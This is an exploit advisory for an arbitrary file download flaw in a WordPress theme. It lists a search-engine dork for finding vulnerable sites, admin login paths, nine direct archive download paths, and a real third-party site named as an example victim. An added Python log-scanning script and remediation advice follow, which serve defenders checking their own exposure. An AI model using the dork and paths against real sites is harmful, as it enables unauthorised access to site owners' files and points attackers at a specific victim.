- #################################################################################################
- # Exploit Title : WordPress NikolayDyankovDesign Themes 2.0 Arbitrary File Download
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 08/12/2018
- # Vendor Homepage : pinterest.com/nikolaydyankov/ ~ nikolaydyankovdesign.com ~ semsoft.ca
- # Software Download Link : N/A
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : 1.0 and 2.0
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/themes/nikolaydyankovdesign/''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] - CWE-23 - [ Relative Path Traversal ] - CWE-200 - [ Information Exposure ]
- #################################################################################################
- # Admin Panel Login Path :
- /demox/admin/
- /wp-log
- # Exploit :
- /wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/flipper-for-wordpress-2-0.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/flipper.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map-for-wordpress.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/timeliner-for-wordpress.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/timelinexml.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline-for-wordpress.zip
- /wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline.zip
- #################################################################################################
- # Example Vulnerable Site =>
- [+] photobook.com.tr/demox/siparis/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
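For site owners checking their own exposure: the paths listed above are archive files served straight from the theme's documentations/ directory, so any successful download is visible in the web server access log. The following is an added example, not part of the original advisory. It assumes Apache/nginx "combined" log format; the function name, the extra archive extensions beyond .zip, and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Theme directory named in the advisory. Extensions other than .zip are an
# added generalization (assumption), not something the advisory lists.
THEME_DIR = "/wp-content/themes/nikolaydyankovdesign/"
ARCHIVE_RE = re.compile(r"\.(zip|tar|tgz|gz|7z|rar|bak|sql)$", re.IGNORECASE)

# Combined log format: ip ident user [time] "METHOD path PROTO" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_archive_downloads(lines):
    """Return {client_ip: [(timestamp, path, bytes_sent), ...]} for served archives."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Drop the query string and decode %xx so encoded paths still match.
        path = unquote(m["path"].split("?", 1)[0])
        if THEME_DIR not in path.lower() or not ARCHIVE_RE.search(path):
            continue
        if m["status"] not in ("200", "206"):
            continue  # 404/403 means the file was not served
        size = 0 if m["size"] == "-" else int(m["size"])
        hits[m["ip"]].append((m["ts"], path, size))
    return dict(hits)

# Constructed sample log lines (documentation-range addresses), not real traffic.
DOCS = THEME_DIR + "documentations/"
SAMPLE_LOG = [
    f'203.0.113.7 - - [08/Dec/2018:10:01:02 +0000] "GET {DOCS}flipper.zip HTTP/1.1" 200 482113 "-" "curl/7.61"',
    f'203.0.113.7 - - [08/Dec/2018:10:01:05 +0000] "GET /shop{DOCS}rockstar-map.zip HTTP/1.1" 200 913002 "-" "curl/7.61"',
    f'198.51.100.20 - - [08/Dec/2018:11:12:40 +0000] "GET {DOCS}timelinexml.zip HTTP/1.1" 404 162 "-" "Mozilla/5.0"',
    f'192.0.2.44 - - [08/Dec/2018:12:30:00 +0000] "GET {THEME_DIR}style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'192.0.2.44 - - [08/Dec/2018:12:30:09 +0000] "GET {DOCS}touch%2Dtimeline.zip?x=1 HTTP/1.1" 206 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, rows in find_archive_downloads(SAMPLE_LOG).items():
        for ts, path, size in rows:
            print(f"{ip}\t{ts}\t{size}\t{path}")
```

If the check reports hits, remove the archives from the theme directory or deny requests for archive extensions under wp-content/themes/ at the web server.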